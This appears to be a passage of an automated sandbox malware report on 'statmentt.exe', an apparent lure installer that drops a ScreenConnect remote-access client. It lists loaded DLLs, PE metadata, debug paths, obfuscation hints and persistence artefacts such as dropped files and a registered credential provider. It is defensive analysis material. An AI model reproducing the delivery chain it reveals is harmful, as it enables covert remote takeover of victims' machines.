                              Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                              Source: statmentt.exeStatic PE information: certificate valid
                              Source: statmentt.exeStatic file information: File size 5652448 > 1048576
                              Source: statmentt.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                              Source: statmentt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                              Source: statmentt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888572432.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: statmentt.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: statmentt.exe
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: statmentt.exe
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.2.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller.Package\Microsoft.Deployment.WindowsInstaller.Package.pdb source: Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr
                              Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: statmentt.exe, ScreenConnect.Core.dll.4.dr, ScreenConnect.Core.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3027011781.0000000002441000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1888442965.0000000001550000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1888844830.00000000015D2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1889347392.0000000003271000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: statmentt.exe
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000007.00000000.1818911448.0000000000F6D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: statmentt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1799483150.0000000004200000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.4.dr
                              Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: statmentt.exe, 68f199.msi.2.dr, 68f19b.msi.2.dr, MSIF488.tmp.2.dr, MSIF739.tmp.2.dr, 68f19a.rbs.2.dr, MSIF458.tmp.2.dr, setup.msi.0.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1837493659.00000000000A2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.4.dr
                              Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: statmentt.exe, 68f199.msi.2.dr, MSIEC0B.tmp.1.dr, 68f19b.msi.2.dr, setup.msi.0.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: statmentt.exe, ScreenConnect.Windows.dll.2.dr, ScreenConnect.Windows.dll.4.dr
                              Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1888572432.0000000001592000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.2.dr
                              Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000007.00000002.3042947726.0000000002A97000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1895492425.0000000013280000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.2.dr
                              Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: statmentt.exe
                              Source: statmentt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                              Source: statmentt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                              Source: statmentt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                              Source: statmentt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                              Source: statmentt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                              Data Obfuscation

                              barindex
                              Source: 0.0.statmentt.exe.11078f8.5.raw.unpack, Program.cs.Net Code: Main System.Reflection.Assembly.Load(byte[])
                              Source: statmentt.exeStatic PE information: real checksum: 0x54fd91 should be: 0x56609d
                              Source: C:\Users\user\Desktop\statmentt.exeCode function: 0_2_017F6F00 push eax; mov dword ptr [esp], ecx0_2_017F6F11
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_0583B483 push eax; ret 7_2_0583B499
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05BE66D0 pushfd ; ret 7_2_05BE66FD
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05BE03A0 pushad ; ret 7_2_05BE03B3
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_05BE43D1 push esp; ret 7_2_05BE43E3
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B2B2B18 push ecx; retf 8_2_00007FFD9B2BB40C
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B2A7523 push ebx; iretd 8_2_00007FFD9B2A756A
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B2BB361 push ecx; retf 8_2_00007FFD9B2BB40C
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B599BE5 push FFFFFFB3h; ret 9_2_00007FFD9B599CF4
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B59279F push ss; iretd 9_2_00007FFD9B5927A6
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B59AA06 push esi; ret 9_2_00007FFD9B59AA07

                              Persistence and Installation Behavior

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: c:\program files (x86)\screenconnect client (de5851ad6e374ce3)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-406f-012c01771397}\inprocserver32
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                              Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp-\ScreenConnect.Windows.dllJump to dropped file
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF488.tmpJump to dropped file
